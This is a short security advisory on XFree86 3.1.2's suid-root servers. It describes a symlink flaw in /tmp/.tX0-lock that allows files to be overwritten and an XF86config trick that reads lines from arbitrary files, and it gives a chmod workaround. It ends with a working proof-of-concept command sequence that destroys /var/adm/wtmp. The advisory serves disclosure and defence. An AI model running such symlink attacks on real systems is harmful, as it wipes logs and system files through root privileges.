There are security holes in XFree86 3.1.2, which installs its servers as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files, it does not take proper precautions to ensure that file permissions are maintained, resulting in the ability to overwrite files, and to read limited portions of other files. The first problem stems from the server opening a temporary file, /tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this file a symlink, the server will overwrite the original file, and then write to it its current pid. Other problems exist in the server relating to similar problems, one such example is the ability to specify an arbitrary file for the XF86config file which will then be opened, and the first line that fails to match the expected format will be output with an error, allowing a line to be read from an arbitrary file. Program: XFree86 3.1.2 servers Affected Operating Systems: All systems with XFree86 3.1.2 installed Requirements: account on system Temporary Patch: chmod o-x /usr/X11R6/bin/XF86* Security Compromise: overwrite arbitrary files Author: Dave M. (davem@cmu.edu) Synopsis: While running suid root, XFree86 servers do not properly check file permissions, allowing a user to overwrite arbitrary files on a system. Exploit: $ ls -l /var/adm/wtmp -rw-r--r-- 1 root root 174104 Dec 30 08:31 /var/adm/wtmp $ ln -s /var/adm/wtmp /tmp/.tX0-lock $ startx (At this point exit X if it started, or else ignore any error messages) $ ls -l /var/adm/wtmp -r--r--r-- 1 root root 11 Dec 30 08:33 /var/adm/wtmp